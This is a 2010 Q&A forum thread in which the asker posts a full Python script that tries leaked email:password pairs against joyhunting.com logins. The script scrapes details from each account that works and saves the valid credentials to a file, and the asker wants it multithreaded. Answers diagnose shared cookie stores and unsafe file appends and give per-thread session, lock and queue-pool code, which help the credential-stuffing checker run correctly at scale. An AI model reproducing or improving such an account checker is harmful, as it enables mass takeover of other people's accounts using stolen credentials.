2010-10-01

Hello all. Python threading and queue question

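I wrote a Python script that uses threads to check whether certain accounts exist on a website.

With a single thread it works well, but when I raise the thread count to 3~5 or more, the results differ noticeably from the single-thread run. I checked manually, and the multi-threaded results are the incorrect ones.

I think my threading code needs tuning, or should I use the Queue module?

Can anyone advise or adjust my script? Thanks in advance!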

# -*- coding: cp949 -*-
import sys, os
import re, time, threading
import urllib
import mechanize
import cookielib
from BeautifulSoup import BeautifulSoup, BeautifulStoneSoup, Tag

# Maximum number of threads to run at any given time.
MAX_PROCS = 5

maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread(threading.Thread):
    llemail = ""
    llpassword = ""

    def __init__(self, lemail, lpassword):
        self.llemail = lemail
        self.llpassword = lpassword
        threading.Thread.__init__(self)

    def run(self):
        valid = []
        llemail = self.llemail
        llpassword = self.llpassword
        try:
            params = urllib.urlencode({'userid': llemail, 'passwd': llpassword})
            rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
            rs = mechanize.urlopen(rq)
            data = rs.read()
            logged_in = r'var _id' in data     # successful login
            if logged_in:
                rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
                rs = mechanize.urlopen(rq)
                maindata = rs.read(50024)
                jun_member = r"준회원"          # "associate member"
                save = open(SAVEFILE, 'a')
                for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
                    matched = match.group(1)
                    for match2 in re.finditer(r"var _gd(.*?);", data):
                        matched2 = match2.group(1)
                        print '%s, %s' % (matched, matched2)
                        break
                    rq1 = mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid=" + llemail + "&ToID=undefined&hide=undefined")
                    rs1 = mechanize.urlopen(rq1)
                    sendmsg = rs1.read()
                    #print sendmsg
                    match3 = ''
                    for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
                        matched3 = match3.group(1)
                        #print matched3
                        print 'bad'
                        break
                    if match3 == '':
                        save.write('%s, %s, %s:%s ' % (matched, matched2, llemail, llpassword + '\n'))
                        save.close()
                        print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
            else:
                print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
                return 0
        except:
            print '[!] Exception checking %s.' % (llemail)
            return 1
        return 0
# Bail out if the file doesn't exist.
try:
    listhandle = open(maillist)
except IOError:
    print '[!] %s does not exist. Please create the file!' % (maillist)
    sys.exit(2)

# Loop through the file
for currline, line in enumerate(listhandle, 1):
    # Parse the line
    try:
        details = line.split(':')
        email = details[0]
        password = details[1].replace('\n', '')
    # Report the error and exit.
    except IndexError:
        print '[!] Parse Error in %s on line %d.' % (maillist, currline)
        sys.exit(1)

    if len(threads) < MAX_PROCS:
        # Start another thread
        print '[ ] Starting thread to check account %s.' % (email)
        thread = CheckMyThread(email, password)
        thread.start()
        threads.append(thread)
    else:
        # Wait for a thread to exit.
        gonext = 0
        while 1 == 1:
            i = 0
            #print '[ ] Checking for a thread to exit...'
            while i < len(threads):
                #print '[ ] %d' % (i)
                try:
                    if threads[i]:
                        if not threads[i].isAlive():
                            #print '[-] Thread %d is dead' % (i)
                            threads.pop(i)
                            print '[ ] Starting thread to check account %s.' % (email)
                            thread = CheckMyThread(email, password)
                            thread.start()
                            threads.append(thread)
                            gonext = 1
                            break
                        else:
                            #print '[+] Thread %d is still running' % (i)
                            pass
                    else:
                        print '[ ] Crap.'
                except NameError:
                    print '[ ] AWWW COME ON!!!!'
                i = i + 1
            time.sleep(0.050)
            if gonext:
                break

Answers


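Can you please specify what the different results are?

From what I see, the code does much more than verify an account.

You are also appending to a single file from multiple threads, which I'd say is not thread-safe.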
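One common way to make the shared-file append safe is to guard it with a single `threading.Lock`. The following is only a minimal sketch under stated assumptions: `save_lock`, `save_result` and `demo` are hypothetical names that do not appear in the question's script, and the demo writes to a temporary file rather than to `valid_joyhunt.txt`.

```python
import os
import tempfile
import threading

# One lock shared by every thread that writes to the results file.
save_lock = threading.Lock()


def save_result(path, line):
    """Append one line to path; only one thread may write at a time."""
    with save_lock:
        with open(path, "a") as handle:
            handle.write(line + "\n")


def demo(num_threads=5, lines_per_thread=50):
    """Hypothetical demo: several threads append to one temporary file."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    os.close(fd)

    def worker(worker_id):
        for n in range(lines_per_thread):
            save_result(path, "worker%d, line%d" % (worker_id, n))

    workers = [threading.Thread(target=worker, args=(i,))
               for i in range(num_threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()

    # Read everything back so the caller can inspect what was written.
    with open(path) as handle:
        written = handle.read().splitlines()
    os.remove(path)
    return written
```

In the question's script, the equivalent change would be to take the lock around the `open(SAVEFILE, 'a')` / `save.write(...)` / `save.close()` sequence inside `run()`.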

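Also, AFAIK mechanize uses a shared cookie store for all requests made through mechanize.Request() and mechanize.urlopen(), so the threads are probably interfering with each other's login sessions. Use a separate mechanize.Browser() inside run() instead of mechanize.Request().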
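The idea of one session per thread can be sketched without mechanize. The example below is an assumption-laden stand-in, not the mechanize API: it uses the Python 3 standard library (`http.cookiejar` and `urllib.request`) to give each thread its own cookie jar, and `make_session` and `AccountChecker` are hypothetical names. With mechanize, the answer's suggestion would amount to creating the `mechanize.Browser()` at the same point in `run()`.

```python
import http.cookiejar
import threading
import urllib.request


def make_session():
    """Build an opener that stores cookies in its own private jar."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(jar))
    return opener, jar


class AccountChecker(threading.Thread):
    """Hypothetical thread class; each instance owns one session."""

    def __init__(self, email, password):
        threading.Thread.__init__(self)
        self.email = email
        self.password = password
        self.opener = None
        self.jar = None

    def run(self):
        # Created inside run(), so no other thread shares these cookies.
        self.opener, self.jar = make_session()
        # A real check would log in with self.opener.open(url, data) here;
        # it is left out so the sketch runs without network access.
```

Because every thread logs in through its own opener, a login cookie set for one account can no longer be overwritten by another thread checking a different account.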


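Hi, if I run one thread, the account verification results are correct, but if I run multiple threads the results are wrong: some accounts are alive but are reported as dead. How can I make this thread-safe, or would using a queue make it thread-safe? Thanks in advance, and sorry for my English. – paul 2010-10-11 05:02:27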


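The problem seems to be mechanize sharing its cookie store (maybe use a 'CookieJar' instead of 'Browser()'?). Anyway, why do you insist on using a queue? It is not a magic thread-safety bullet. – Almad 2010-10-11 15:26:46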
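For reference, a queue-based worker pool could look roughly like the sketch below. It is written for Python 3, where the module is named `queue` (it is `Queue` in the Python 2 used by the question). `check_account`, `worker` and `run_checks` are hypothetical names, and `check_account` is a placeholder for the real login check. As the comment above points out, the queue only distributes work and replaces the manual polling loop; shared cookies and shared files still need their own protection.

```python
import queue      # named Queue in Python 2
import threading


def check_account(email, password):
    """Hypothetical stand-in for the real login check."""
    return password != ""


def worker(tasks, results, results_lock):
    """Pull accounts off the queue until a None sentinel arrives."""
    while True:
        item = tasks.get()
        if item is None:
            tasks.task_done()
            break
        email, password = item
        ok = check_account(email, password)
        with results_lock:
            results.append((email, ok))
        tasks.task_done()


def run_checks(accounts, num_workers=5):
    """Check every (email, password) pair with a fixed pool of threads."""
    tasks = queue.Queue()
    results = []
    results_lock = threading.Lock()
    pool = [threading.Thread(target=worker,
                             args=(tasks, results, results_lock))
            for _ in range(num_workers)]
    for t in pool:
        t.start()
    for account in accounts:
        tasks.put(account)
    for _ in pool:
        tasks.put(None)   # one sentinel per worker
    tasks.join()
    for t in pool:
        t.join()
    return results
```

A call such as `run_checks([("a@example.com", "pw")], num_workers=3)` returns a list of `(email, ok)` pairs in whatever order the workers finished.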